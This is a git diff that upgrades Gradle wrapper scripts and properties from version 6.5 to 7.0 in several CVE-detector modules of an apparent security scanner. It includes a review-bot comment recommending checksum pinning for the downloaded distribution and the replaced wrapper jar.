@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve20187600/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve20187600/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve20187600/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve20187600/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve20187600/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve20187600/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve20187600/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve20187600/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists 
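Review bot: The updated `gradle-wrapper.properties` for cve20187600 has no `distributionSha256Sum`, so the `gradle-7.0-bin.zip` fetched from `distributionUrl` is not pinned to a known digest; the added `validateDistributionUrl=true` appears to concern the URL rather than the archive contents. I would add `distributionSha256Sum=<SHA-256 of gradle-7.0-bin.zip as published by Gradle (placeholder)>` directly under `distributionUrl`. The same applies to the matching properties hunks for cve20196340 and cve20199193 further down. Separately, each module's `gradle-wrapper.jar` is replaced as an opaque binary (new index `d64cd4917`) that the diff cannot show, so its checksum should be compared against the wrapper checksums Gradle publishes before this is merged.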
diff --git a/google/detectors/rce/cve20187600/gradlew b/google/detectors/rce/cve20187600/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve20187600/gradlew +++ b/google/detectors/rce/cve20187600/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve20187600/gradlew.bat b/google/detectors/rce/cve20187600/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve20187600/gradlew.bat +++ b/google/detectors/rce/cve20187600/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve20196340/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve20196340/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve20196340/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve20196340/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve20196340/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve20196340/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve20196340/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve20196340/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists 
diff --git a/google/detectors/rce/cve20196340/gradlew b/google/detectors/rce/cve20196340/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve20196340/gradlew +++ b/google/detectors/rce/cve20196340/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a 